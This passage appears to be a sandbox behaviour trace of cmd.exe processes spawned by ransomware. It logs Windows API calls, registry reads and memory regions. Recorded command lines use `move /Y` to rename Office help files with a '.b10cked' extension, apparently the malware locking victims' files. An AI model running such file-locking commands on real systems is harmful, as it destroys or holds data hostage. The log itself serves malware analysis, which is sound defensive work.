lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x0, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegCloseKey (hKey=0x40) returned 0x0 [0201.437] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aeb2c | out: phkResult=0x2aeb2c*=0x40) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x40, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x1, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x0, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x9, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x4, lpData=0x2aeb38*=0x9, lpcbData=0x2aeb30*=0x4) returned 0x0 [0201.437] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeb34, lpData=0x2aeb38, lpcbData=0x2aeb30*=0x1000 | out: lpType=0x2aeb34*=0x0, lpData=0x2aeb38*=0x9, lpcbData=0x2aeb30*=0x1000) returned 0x2 [0201.437] RegCloseKey (hKey=0x40) returned 0x0 [0201.437] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.437] srand (_Seed=0x5b8863a3) [0201.438] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"" [0201.438] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"" [0201.438] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.438] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.438] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.438] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.438] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.438] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.438] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.438] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.438] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.438] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.438] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.438] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.438] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.438] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.439] GetEnvironmentStringsW () returned 0x3322d0* [0201.439] FreeEnvironmentStringsW (penv=0x3322d0) returned 1 [0201.439] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.439] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.439] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.439] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.439] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.439] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.439] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.439] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.439] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.439] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.439] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af8f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af8f8, lpFilePart=0x2af8f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af8f4*="Desktop") returned 0x18 [0201.439] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.439] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af674 | out: lpFindFileData=0x2af674) returned 0x330010 [0201.439] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0201.439] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af674 | out: lpFindFileData=0x2af674) returned 0x330010 [0201.440] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0201.440] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af674 | out: lpFindFileData=0x2af674) returned 0x330010 [0201.440] FindClose (in: hFindFile=0x330010 | out: hFindFile=0x330010) returned 1 [0201.440] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.440] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.440] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.440] GetEnvironmentStringsW () returned 0x332af0* [0201.440] FreeEnvironmentStringsW (penv=0x332af0) returned 1 [0201.440] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.441] GetConsoleOutputCP () returned 0x1b5 [0201.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.441] GetUserDefaultLCID () returned 0x409 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afa38, cchData=128 | out: lpLCData="0") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afa38, cchData=128 | out: lpLCData="0") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afa38, cchData=128 | out: lpLCData="1") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.441] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.441] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.442] GetConsoleTitleW (in: lpConsoleTitle=0x3208e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.442] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.442] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.442] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.443] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.443] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.443] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.443] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.443] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.443] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.443] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.443] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.446] GetConsoleTitleW (in: lpConsoleTitle=0x2af730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.447] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.447] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.447] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.448] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.448] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.448] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.448] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.448] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.448] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.448] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.448] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.448] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.448] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.448] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.448] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.448] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.448] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.448] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.448] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.448] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.448] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.448] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.448] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.448] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.448] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.450] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af4ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af4e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af4e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.451] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.452] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.452] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.452] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.475] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.476] _wcsicmp (_String1="MSMSPU~1.HXN", _String2=".") returned 63 [0201.476] _wcsicmp (_String1="MSMSPU~1.HXN", _String2="..") returned 63 [0201.476] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~1.hxn")) returned 0x2022 [0201.476] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.476] SetErrorMode (uMode=0x0) returned 0x0 [0201.476] SetErrorMode (uMode=0x1) returned 0x0 [0201.476] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", nBufferLength=0x104, lpBuffer=0x2aee74, lpFilePart=0x2aee5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", lpFilePart=0x2aee5c*="MSMSPU~1.HXN") returned 0x27 [0201.476] SetErrorMode (uMode=0x0) returned 0x1 [0201.476] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.477] _wcsicmp (_String1="MSMSPU~1.HXN", _String2=".") returned 63 [0201.477] _wcsicmp (_String1="MSMSPU~1.HXN", _String2="..") returned 63 [0201.477] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~1.hxn")) returned 0x2022 [0201.477] SetErrorMode (uMode=0x0) returned 0x0 [0201.477] SetErrorMode (uMode=0x1) returned 0x0 [0201.477] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", nBufferLength=0x104, lpBuffer=0x2af2f0, lpFilePart=0x2af088 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", lpFilePart=0x2af088*="MSMSPU~1.HXN") returned 0x27 [0201.477] SetErrorMode (uMode=0x0) returned 0x1 [0201.477] SetErrorMode (uMode=0x0) returned 0x0 [0201.478] SetErrorMode (uMode=0x1) returned 0x0 [0201.478] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2af4f8, lpFilePart=0x2af088 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked", lpFilePart=0x2af088*="MS.MSPUB.14.1033.hxn.b10cked") returned 0x37 [0201.478] SetErrorMode (uMode=0x0) returned 0x1 [0201.478] SetLastError (dwErrCode=0x0) [0201.478] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.mspub.14.1033.hxn.b10cked")) returned 0xffffffff [0201.478] GetLastError () returned 0x2 [0201.478] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2aea04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aea04) returned 0x320e68 [0201.478] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x2aea04 | out: lpFindFileData=0x2aea04) returned 0 [0201.479] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) returned 1 [0201.479] GetLastError () returned 0x12 [0201.479] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2aea04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aea04) returned 0x320e68 [0201.479] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x2aea04 | out: lpFindFileData=0x2aea04) returned 0 [0201.479] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) returned 1 [0201.479] GetLastError () returned 0x12 [0201.480] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bd8) returned 0x320e68 [0201.480] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x331bd8 | out: lpFindFileData=0x331bd8) returned 0 [0201.480] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) returned 1 [0201.481] GetLastError () returned 0x12 [0201.481] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x331bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bd8) returned 0x320e68 [0201.481] FindNextFileW (in: hFindFile=0x320e68, lpFindFileData=0x331bd8 | out: lpFindFileData=0x331bd8) returned 0 [0201.481] FindClose (in: hFindFile=0x320e68 | out: hFindFile=0x320e68) returned 1 [0201.481] GetLastError () returned 0x12 [0201.481] _get_osfhandle (_FileHandle=2) returned 0xb [0201.481] GetFileType (hFile=0xb) returned 0x2 [0201.481] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.481] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2aebd4 | out: lpMode=0x2aebd4) returned 1 [0201.482] _get_osfhandle (_FileHandle=2) returned 0xb [0201.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2aec08 | out: lpConsoleScreenBufferInfo=0x2aec08) returned 1 [0201.482] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.483] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2aec48 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.483] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2aec2c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2aec2c*=0x2c) returned 1 [0201.484] longjmp () [0201.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.484] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.484] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.484] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.484] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.484] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.484] SetConsoleInputExeNameW () returned 0x1 [0201.484] GetConsoleOutputCP () returned 0x1b5 [0201.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.485] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.485] exit (_Code=1) Process: id = "468" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xda4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29266 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29267 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29268 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29269 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29270 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29271 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29272 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename 